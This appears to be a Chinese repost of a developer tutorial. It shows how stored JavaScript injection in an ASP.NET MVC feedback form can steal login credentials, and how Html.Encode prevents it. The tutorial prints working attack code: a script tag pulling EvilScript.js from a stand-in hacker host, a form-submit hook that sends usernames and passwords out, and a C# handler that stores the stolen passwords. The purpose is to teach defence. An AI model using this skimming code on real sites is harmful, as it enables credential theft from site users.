转:
http://www.dwww.cn/News/2008-7/20087131938347687.shtml
摘要:在这个Tip中,你将了解到JavaScript注入攻击可能会比你想象的更加严重。Stephen Walther展示了如何使用JavaScript注入攻击来在一个ASP.NET MVC站点上干些大大的坏事,并解释了如何通过一种简单的方式来防止这种攻击。
当你从站点的浏览者那里收集表单数据,并将表单数据展示给其他浏览者时,你应该对表单数据进行编码。否则,你的站点大门将为JavaScript注入攻击打开。
例如,如果你创建了一个论坛,在将消息显示到Web页面之前,请确保对其进行了编码。如果你没有对消息进行编码,某些人可能会发表一个带JavaScript的消息,做一件大大的坏事。
在这个Tip中,我将强调黑客可以利用JavaScript注入攻击做非常严重的事情。让我惊奇的是,关心防止JavaScript注入攻击的Web开发者少之又少。这里的问题在于很多开发者并没有完全意识到这其中的危险。他们认为使用JavaScript注入攻击最坏的情况也就是破坏页面结构。在这个Tip中,我将向你展示黑客如何利用JavaScript注入攻击来盗取网站用户的用户名和密码。本文的要点是通过恐吓来教会你做正确的事情。
据Wikipedia称,JavaScript注入攻击已经“超越缓冲区溢出,成为最常见的公共安全弱点。”更恐怖的是,据Wikipedia称,70%的网站向JavaScript注入攻击敞开着(http://en.wikipedia.org/wiki/Cross-site_scripting)。因此,本文读者,你们当中的70%正在犯懒并危害着你们网站的用户。羞羞!
如何通过JavaScript盗取另一个用户的密码
这里介绍一下黑客如何利用JavaScript注入攻击做大大的坏事。假设你建立了一个Customer Survey应用程序,使用的是ASP.NET MVC。
Customer Survey应用程序是一个超级简单的应用程序。用户通过在一个表单中填写内容,可以对一个产品进行反馈。客户可以查看之前所有客户留下的反馈。
图1展示了反馈表单。
图1 - 反馈表单
注意反馈表单页面的顶部还包含了一个登录表单。Customer Survey应用程序将登录表单放到了母版页中(Web站点的常见场景)。
由于反馈表单显示了其它客户留下的反馈,该页面将对JavaScript注入攻击敞开大门。那些心怀恶意的黑客只需在反馈表单中敲入下面的代码:
<script src=http://HackerSite.com/EvilScript.js></script>
当该文本重新显示在反馈表单页中时,<script>标签会调用一个位于黑客的站点上的JavaScript脚本。该脚本如清单1所示。
清单1 - EvilScript.js
if (window.attachEvent)
document.forms[0].attachEvent('onsubmit', fn);
function fn(e)
{
var userName = document.getElementById("userName").value;
var password = document.getElementById("password").value;
var d = new Date();
var url = "HackerSite/EvilHandler.ashx?userName=" + userName
+ "&password=" + password + "&d=" + d.valueOf();
var script = document.createElement("script");
script.type = 'text/javascript';
script.src = url;
document.body.appendChild( script );
}
清单1中的脚本将一个事件处理器附加到了登录表单的form submit事件上。当登录表单提交时,会执行fn() JavaScript函数。该函数截取了表单中的userName和password字段。接下来,该脚本向页面中动态注入了一个<script>标签,并将userName和password传递给一个名为EvilHandler.ashx的(可能是远程的)处理器。
EvilHandler的代码如清单2所示。EvilHandler简单地从查询字符串中拿到了用户名和密码,并存放在数据库中。
清单2 - EvilHandler.ashx
using System;
using System.Collections;
using System.Data;
using System.Linq;
using System.Web;
using System.Web.Services;
using System.Web.Services.Protocols;
using System.Xml.Linq;
namespace CustomerSurvey.HackerSite
{
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class EvilHandler : IHttpHandler
{
public void ProcessRequest(HttpContext context)
{
// Get user name and password from URL
string userName = context.Request.QueryString["userName"];
string password = context.Request.QueryString["password"];
// Store in database
HackerDataContext db = new HackerDataContext();
StolenPassword pwd = new StolenPassword();
pwd.userName = userName;
pwd.password = password;
db.StolenPasswords.InsertOnSubmit(pwd);
db.SubmitChanges();
}
public bool IsReusable
{
get
{
return false;
}
}
}
}
假设这个Customer Feedback表单出现在一个银行网站中。在这种情况下,黑客现在就能访问任何人的帐户信息了,并能把任何人的钱转到位于开曼群岛的帐户中。很不错,才需要这么几行代码。
ASP.NET MVC不支持请求验证
这种危险在ASP.NET MVC应用程序中更为敏感一些。在ASP.NET Web Forms应用程序中——和ASP.NET MVC不同——你可以依赖一项称作请求验证(Request Validation)的特性。如果从一个页面提交的表单数据中含有看起来不安全的文字,请求验证就能检测到。如果你提交的表单数据中包含诸如尖括号这样的文本,就会导致异常的抛出。
要知道ASP.NET MVC并不适用请求验证。在ASP.NET MVC应用程序中,你必须完全由自己来防止JavaScript注入攻击。
防止JavaScript注入攻击
防止JavaScript注入攻击其实很简单。确保每当你在视图中显示从用户那里获取的表单数据时都调用了Html.Encode()即可。
例如,下面是Index视图中用于显示用户反馈的部分代码:
<h1>Customer Feedback</h1>
<ul>
<% foreach (Survey survey in ViewData.Model)
{ %>
<li>
<%= survey.EntryDate.ToShortDateString() %>
—
<%= survey.Feedback %>
</li>
<% } %>
</ul>
该代码包含一个循环,遍历了Suvey实体。为每个Survey实体显示了Feedback和EntryDate属性。
为了防止JavaScript注入攻击,你需要使用Html.Encode()辅助方法。下面是循环代码的正确编写方式:
<h1>Customer Feedback</h1>
<ul>
<% foreach (Survey survey in ViewData.Model)
{ %>
<li>
<%= survey.EntryDate.ToShortDateString() %>
—
<%= Html.Encode(survey.Feedback) %>
</li>
<% } %>
</ul>
哪些内容需要编码
注意在前面的代码中,我并没有对EntryDate属性进行编码。在向页面显示EntryDate属性时无需进行编码的原因有二。
首先,EntryDate并不是由网站的访问者输入的。EntryDate属性的值是由代码生成的。黑客无法在这里注入危险代码。
假设的确是由访问者来输入EntryDate属性。由于EntryDate在SQL Server数据库中是作为DateTime类型存放的,黑客也不可能向其中注入恶意代码。因此,你无须担心是否需要对该属性进行编码。
通常,任何时候你在接受用户输入的文本内容时都要注意JavaScript注入攻击。例如,要小心地显示用户名。如果你允许用户创建属于他们自己的用户名,则用户可能偷偷地将一个恶意JavaScript字符串放在他们的用户名中(或一个指向sex图片的img标签)。
另外,小心超链接。很多blog应用程序允许匿名用户在发表评论时填写他们的网站链接。黑客可能会向链接中嵌入而已JavaScript。下面是一个简单的例子:
<a href="javascript:alert('Something Evil!')">Mr. Hacker</a>
当你单击该链接时,JavaScript就会执行。在这种情况下,没有什么恶劣的事发生。但是,你可能执行的是窃取表单数据或cookies数据的代码。
验证、会话状态和HttpOnly Cookies
你可以利用JavaScript注入攻击来窃取Cookies。例如,你将用户的信用卡号存放在一个Cookies中,然后你可以向页面中注入JavaScript,使用document.cookie DOM属性来截取信用卡号。
ASP.NET Forms Authentication和ASP.NET Session State都使用Cookie。Forms Authentication依赖于一个存放在名为.ASPXAUTH的Cookie中的验证票据(Ticket)。Session State使用一个名为ASP.NET_SessionId的Cookie。如果可以窃取这些Cookies,你就能模仿其他网站用户并且去用户的会话状态信息。
幸运的是,Microsoft对此采取了预防措施,使得很难窃取Forms Authentication和Session State Cookies。它们的Cookies都是HttpOnly Cookie。HttpOnly Cookie是一种特殊的Cookie,它不能通过客户端代码读取。你只能在Web服务器上读取HttpOnly Cookie。
Microsoft Internet Explorer、Firefox和Opera都支持HttpOnly Cookies。Safari和一些比较老的浏览器——很不幸——不支持。因此,你仍需要注意为所有用户输入数据进行HTML编码,以避免黑客盗取Forms Authentication和Session State Cookie。
小结
该Tip的目的是通过恐吓教会你做正确的事情。正如在简介中提到那样,JavaScript注入攻击是最常见的安全攻击类型。很多开发者并没有花费太多时间关心它。希望该Tip能够让你注意,每当在MVC视图中显示从用户那里收集来得数据时,都要进行编码。
你可以通过点击下面的链接来尝试本文讨论的代码。当你输入用户名和密码后,单击登录表单中的按钮,用户名和密码会出现在StolenPasswords数据库表中。
此处下载源代码:
http://weblogs.asp.net/blogs/stephenwalther/Downloads/Tip7/Tip7.zip
分享到:
相关推荐
Asp 加密 解密 脚本 批量 VBScript.Encode
asp.net网站源代码 <strong>Title</strong>:<%=Html.Encode(book.Title) %> <strong>Author</strong>:<%=Html.Encode(book.Author) %> <strong>PubDate</strong>:<%=Html.Encode(book.PubDate....
Asp.Net中使用水晶报表 javascript提示类 分页 类 数据绑定 数据库方面 文件操作 验证码 ASP.NET 2.0高级控件之FileUpload控件.txt ASP.NET 程序中常用的三十三种代码.txt asp.net使用客户端验证.txt Asp.net中基于...
Asp网站助手加解密工具(VBScript.Encode) V1.3.rar 能够编译一般的ASP加密程序,开源用
JScript.Encode脚本加密工具
QRCode二维码维码支持中文Asp.Net(C#),是VS2010的项目,VS2008、VS2005也可以用,需要在你的项目里引用ThoughtWorks.QRCode.dll,在二维码生成页面内加上下面的代码: using System.Drawing.Imaging; using Thought...
文件当中有,乱码可使用VBScript.Encode.转换源码工具
ASP.NET常用代码 1. 打开新的窗口并传送参数: 传送参数: response.write("<script>window.open('*.aspx?id="+this.DropDownList1.SelectIndex+"&id1="+...+"')</script>") 接收参数: string a = Request....
VBScript.Encode解密,VBScript.Encode解密器,VBScript.Encode解密解码器
AspVBScript.Encode
Asp.net教学讲义 1 讲义内容 6 第一章:asp.net和web窗体 6 1.1 NET应用开发架构简介 6 1.1.1. NET框架结构 6 1.1.2 http协议简介 6 1.1.3 静态网页与动态网页 8 1.1.4 客户端代码与服务器端代码 8 1.1.5 ASP.NET...
asp解密HTML页 VBscript.Encode解码器
.net 简繁体转换 Encode.dll EncodeRobert Traditional。 .net实现简繁体转换 主要用Encode.dll 实现的。 我发上来的是实例源码,大家有兴趣的可以用反编译工具看看Encode.dll 的代码实现。 具体用法请参考: ...
Bencode 解码器/编码器使用 Elixir 数据结构。 安装 将其添加到您的mix.exs依赖项中: defp deps do [{ :elixir_bencode , " ~> 1.0.0 " }] end 例子 ## Encode strings (with thrown exceptions) Bencode . ...
实例如下: # bytes object ...str.encode(s) # bytes to str bytes.decode(b) 以上这篇python字符串str和字节数组相互转化方法就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多
求解开jscript.encode代码的asp函数.docx
这是一个DOME,直接下载使用,仅实现二维码生成功能,如要增加二维码打印功能可以参考以下代码,如要增加其他功能请自行开发。 Image image = qrCodeEncoder.Encode(strData); Bitmap printPicture = new Bitmap...
VBscript.Encode解密 你懂的